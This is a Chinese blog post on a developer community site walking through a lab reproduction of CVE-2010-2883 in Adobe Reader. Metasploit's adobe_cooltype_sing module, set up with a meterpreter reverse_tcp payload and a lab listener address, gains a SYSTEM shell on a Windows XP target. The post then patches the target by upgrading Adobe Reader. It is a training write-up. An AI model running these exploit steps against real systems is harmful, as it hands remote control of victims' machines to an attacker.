首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >CVE-2010-2883-PDF漏洞提权复现过程

CVE-2010-2883-PDF漏洞提权复现过程

作者头像
XPcode7
发布2025-10-23 13:02:32
发布2025-10-23 13:02:32
100
举报

第二步,打开Kali Linux渗透机使用命令msfconsole进入Metasploit渗透测试平台,使用模块adobe_cooltype_sing生成木马文件。

输入search adobe_cooltype_sing命令搜索Adobe渗透模块

与漏洞相关的模块有两个,编号为0的模块是使用本地的服务器挂载木马文件的模块,编号为1的模块是生成木马文件需要用到的模块。

使用use exploit/windows/browser/adobe_cooltype_sing命令调用渗透模块,并查看模块的详情

使用set SRVHOST 172.16.1.100命令,设置渗透机监听的Apache服务地址

使用set payload windows/meterpreter/reverse_tcp命令设置meterpreter载荷

使用set LHOST 172.16.1.100命令设置Kali用于监听本地地址

使用set LPORT 命令设置本地用于监听的端口

使用命令show options查看配置完成的参数

最后使用命令exploit执行模块

得到一个http://172.16.1.100:8080/RlMOOPnOuIvk的URL地址

第三步,打开靶机Windows XP的IE浏览器,使用浏览器访问上面生成的URL

第四步,切换至渗透机中查看效果

此时已获得系统最高权限,使用命令session -i查看当前后台活跃的会话。

使用命令session -i 1切换到编号为1的会话中,并使用命令shell进入靶机命令终端

第五步,回到靶机Windows XP安装最新版的Adobe Reader阅读软件。首先在安装新版本的Adobe Reader软件之前卸载旧版本的软件

选择Remove,然后点Next,接下来直接选Next继续,将Adobe Reader卸载掉

然后安装新的版本,安装文件(Adobe_Reader_11.exe)位于桌面  

勾选上自动安装更新(推荐)(A),然后点安装

安装成功后再次访问URL链接

回到渗透机中查看效果

发现木马已经失效,加固成功。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2025-10-22,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档